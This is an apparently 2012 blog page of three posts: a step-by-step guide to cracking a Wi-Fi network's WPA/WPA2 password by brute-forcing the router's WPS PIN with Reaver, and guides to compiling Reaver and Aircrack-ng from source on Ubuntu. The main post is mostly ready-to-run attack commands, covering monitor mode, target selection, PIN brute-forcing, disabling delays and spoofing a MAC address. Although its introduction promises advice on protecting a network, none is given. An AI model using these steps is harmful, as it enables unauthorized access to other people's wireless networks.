Saturday, December 29, 2012

How to Crack a Wi-Fi Network’s WPA Password with Reaver

A new, free, open-source tool called Reaver exploits a security hole in wireless routers and can crack most routers' current passwords with relative ease. Here's how to crack a WPA or WPA2 password, step by step, with Reaver—and how to protect your network against Reaver attacks.

On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

What You'll Need
#A PC running Linux.
#A computer with Wi-Fi

Run the following commands(# Bold) in the terminal.(without #)

Step 1: Install Airmon-ng Suite from my previous post.

Step 2: Install Reaver from my previous post.

Step 3: To get root privileges, in terminal type:

# sudo -s

Step 4: Find your wireless card.Inside terminal type:


# iwconfig

Step 5: Put your wireless card into monitor mode.Assuming your wireless card's interface name is wlan0, execute the following command to put your wireless card into monitor mode:

# airmon-ng start wlan0

Step 6: In terminal type:

# airodump-ng mon0

It will display a list of wireless networks in range. When you see the network you want to crack, press Ctrl+C to stop the list from refreshing, then copy that network's BSSID (MAC address of the targeted network). The network should have WPA or WPA2 listed under the ENC column.

Step 7: Now we start cracking password with Reaver. 

# reaver -i moninterface -b bssid -vv

For example, if your monitor interface was mon0 like mine, and your BSSID was 7F:AC:6B:MB:1F:B2 (a BSSID I just made up), your command would look like:

# reaver -i mon0 -b 7F:AC:6B:MB:1F:B2 -vv

Now sit back and relax as Reaver will now try a series of PINs on the router in a brute force attack. The Reaver documentation says it can take between 4 and 10 hours.

Speeding Up the Attack

By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:


# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small diffie-hellman secret numbers in order to reduce the computational load on the target AP:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small

MAC Spoofing

In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.
Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface. For example:

# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69

If you encounter any problem you can post a comment below or visit Reaver website

Friday, November 30, 2012

How to install Reaver on Ubuntu

Many of the uses of  Ubuntu is that  you can crack wireless networks. I recently moved to Ubuntu and found that Reaver was NOT in the repository. So here's a simple How To install Reaver guide on Ubuntu.

Run the following commands(in "Bold") in the terminal.
Step 1: "sudo -s"

Type your password.
Installing Dependencies and required tools.

Step 2: "sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev"

Now we have the Dependencies and required tools. We can download the Reaver Source and Install it.

Step 3: "wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz"

Extracting the tar package.

Step 4: "tar -xzvf reaver-1.4.tar.gz"

Compiling and making install.

Step 5: "cd reaver-1.4"


Step 6: "cd src"


Step 7: "./configure"

Step 8: "make"

Step 9: "sudo make install"

Reaver is now installed and ready to use. But before you get hacking WPA networks, you'll need to install Aircrack-ng. Install it from my previous post How to install aircrack-ng on ubuntu.

Monday, October 15, 2012

How to install Aircrack-ng on Ubuntu 12.04

Many of the uses of  Ubuntu is that  you can crack wireless networks. I recently moved to Ubuntu 12.04 and found that aircrack-ng was NOT in the repository. So here's a simple How To install Aircrack-ng on Ubuntu 12.04.

So we will be compiling aircrack-ng from the source.But there are errors, mostly to do with a variable called -Werror in the source. This is what you need to do to compile aircrack-ng without the pesky errors.

Run the following commands(in "Bold") in the terminal.
Step 1: "sudo -s"
Type your password.

Step 2: "apt-get install build-essential"

Step 3: "sudo apt-get install libssl-dev"

Now we have installed the dependencies, we move to our next step that is downloading the source of Aircrack-ng.

Step 4: "wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz"

Step 5: "tar -zxvf aircrack-ng-1.1.tar.gz"

Step 6: After the download, there will be a file called common.mak in the dirctory downloads/aircrack-ng-1.1 .use your favorite editor to open the file and scroll down till you see the following line.
CFLAGS ?= -g -W -Wall -Werror -O3
Delete the -Werror variable, so that the line now looks like the following.

CFLAGS ?= -g -W -Wall -O3
Save and Exit.

Step 7: Copy the whole aircrack-ng-1.1 folder and paste it in the Home Directory.
Step 8: "cd aircrack-ng-1.1"

Step 9: "make"

Step 10: "make install"

You Aircrack-ng is up and running. Now you may want to install reaver to get things crackin' .